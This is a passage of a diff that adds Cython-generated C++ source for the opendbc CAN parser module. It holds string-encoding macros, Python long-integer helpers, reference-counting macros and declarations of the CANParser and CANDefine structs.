__PYX_DEFAULT_STRING_ENCODING_IS_ASCII 1 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "ascii" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "opendbc/can/parser_pyx.pyx", + "", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser; +struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine; +struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__; +struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr; +struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr; + +/* "common.pxd":10 + * + * + * ctypedef unsigned int (*calc_checksum_type)(uint32_t, const Signal&, const vector[uint8_t] &) # <<<<<<<<<<<<<< + * + * cdef extern from "common_dbc.h": + */ +typedef unsigned int (*__pyx_t_7opendbc_3can_6common_calc_checksum_type)(uint32_t, struct Signal const &, std::vector const &); + +/* "opendbc/can/parser_pyx.pyx":18 + * + * + * cdef class CANParser: # <<<<<<<<<<<<<< + * cdef: + * cpp_CANParser *can + */ +struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser { + PyObject_HEAD + CANParser *can; + struct DBC const *dbc; + std::map address_to_msg_name; + std::vector can_values; + PyObject *vl; + PyObject *vl_all; + PyObject *ts_nanos; + std::string dbc_name; +}; + + +/* "opendbc/can/parser_pyx.pyx":143 + * + * + * cdef class CANDefine(): # <<<<<<<<<<<<<< + * cdef: + * const DBC *dbc + */ +struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine { + PyObject_HEAD + struct DBC const *dbc; + PyObject *dv; + std::string dbc_name; +}; + + +/* "opendbc/can/parser_pyx.pyx":31 + * string dbc_name + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): # <<<<<<<<<<<<<< + * if checks is None: + * checks = [] + */ +struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ { + PyObject_HEAD + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self; +}; + + +/* "opendbc/can/parser_pyx.pyx":88 + * unchecked = signal_addrs - checked_addrs + * if len(unchecked): + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) # <<<<<<<<<<<<<< + * raise RuntimeError(f"Unchecked addrs: {err_msg}") + * + */ +struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr { + PyObject_HEAD + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *__pyx_outer_scope; + PyObject *__pyx_genexpr_arg_0; + PyObject *__pyx_v_addr; +}; + + +/* "opendbc/can/parser_pyx.pyx":98 + * signal_options_v.push_back(spo) + * + * message_options = dict((address, 0) for _, address in signals) # <<<<<<<<<<<<<< + * message_options.update(dict(checks)) + * + */ +struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr { + PyObject_HEAD + PyObject *__pyx_genexpr_arg_0; + PyObject *__pyx_v__; + PyObject *__pyx_v_address; +}; + +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* RaiseUnboundLocalError.proto */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); + +/* ListCompAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len)) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) +#endif + +/* IncludeCppStringH.proto */ +#include + +/* decode_c_string_utf16.proto */ +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 0; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16LE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = -1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16BE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} + +/* decode_c_bytes.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_bytes( + const char* cstring, Py_ssize_t length, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)); + +/* decode_cpp_string.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_cpp_string( + std::string cppstring, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + return __Pyx_decode_c_bytes( + cppstring.data(), cppstring.size(), start, stop, encoding, errors, decode_func); +} + +/* RaiseClosureNameError.proto */ +static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname); + +/* PyFunctionFastCall.proto */ +#if 